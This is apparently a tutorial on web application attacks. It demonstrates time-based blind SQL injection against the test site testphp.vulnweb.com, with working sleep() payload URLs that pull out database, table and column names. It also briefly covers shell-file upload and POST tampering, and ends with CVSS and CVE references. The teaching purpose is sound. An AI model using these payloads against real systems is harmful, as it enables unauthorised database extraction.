Time Based SQL Injection Attack In Web Applications

Time Based SQL Injection Attack In Web Applications : In  this  cyberpointsolution tutorial we are going to describe about the Time Based SQL Injection Attack In Web Applications.

Time Based SQL Injection Attack In Web Applications

---

TIME BASED SQL INJECTION

Time Based SQL Injection is the subcategory of Blind Based SQL Injection in which when we input a Query, While explain/analyze doesn’t return the result of the query, it does return metadata about the query. It means how long it takes the query to execute and return back the metadata.

They are often use to extracts the data when there no other way to retrieve the data from the database while executing a query in the database which creates a time delay if the query is right depending on the time it takes to get the server response. As you can guess, this type of inference approach is particularly useful for blind injection attacks. It is basically used by using queries which results to delay of response.

DEMONSTRATION

Target – testphp.vulnweb.com

Using “sleep()” command which will delay the response for some time.

Vulnerable GET Method – http://testphp.vulnweb.com/listproducts.php?cat=2

STEPS

Finding a GET method.
Using Sleep query as :

= ?cat=2 and (select sleep(10) from dual where database() like ‘%’)–+
This will execute the query in 10 seconds if the query is right.

This will helps in executing and finding out the Database name or any other details. If there will be a Delay, that means there is a Data exist like query we have put in.
For eg.

http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like “acu%”)–+

http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like “acuart”)–+

Same for finding the table names:
= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from information_schema.tables where table_name like “use%”)–+

Finding Columns Names of our desired Table :
= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) column_name from information_schema.columns where table_name=”users” like “%”)–+

ARBITRARY FILE UPLOAD

=====================
Arbitrary File – An Arbitrary file is a Malicious Shell File which if Uploaded by a Attacker into a Web Application, will give a full Control to the Server Machine the website is hosted including exploring and doing any operations.
Arbitrary File upload is a Situation where we input and upload such Arbitrary Files into the input method of those web application and get the whole access of the Server Machine a website is hosted.

Attack Vectors

A attacker can get full control of the Server Machine.
After getting access into the server, he/she can Deface and delete all the websites hosted in the Server if it is a Shared Server.

Demonstration in DVWA and LVS.

————————————————————————————

POST PARAMETER INJECTION

POST Parameter Injection is the attack vector when we tamper and manipulate POST Parameters and with HTTP Headers through some tools like Tamper Data, Burp Suite etc.
First we have to capture the http packets Parameters moving from a browser to a Web Server.

Demonstration on DVWA Arbitrary File Upload on Medium Level on changing extension of the Arbitrary File through Tamper Data.

TOOLS
——-
Tamper Data
Burpsuite

———————————————————————————————————-

Application to automate VAPT

Acunetix Demonstration. – https://www.acunetix.com/vulnerability-scanner/download/
With Installation and Report Generation.

CVSS Score – The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.

Websites:
https://nvd.nist.gov/vuln-metrics/cvss

CVE – CVE stands for Common Vulnerability and Exposures is a list of information security vulnerabilities and exposures that aims to provide common names for publicly known problems. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, repositories, and services) with this “common enumeration.”

Websites :
https://cve.mitre.org/
https://www.cvedetails.com/
https://nvd.nist.gov/

Exploit-DB – The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers of Offensive Security.
Websites :
https://www.exploit-db.com/

---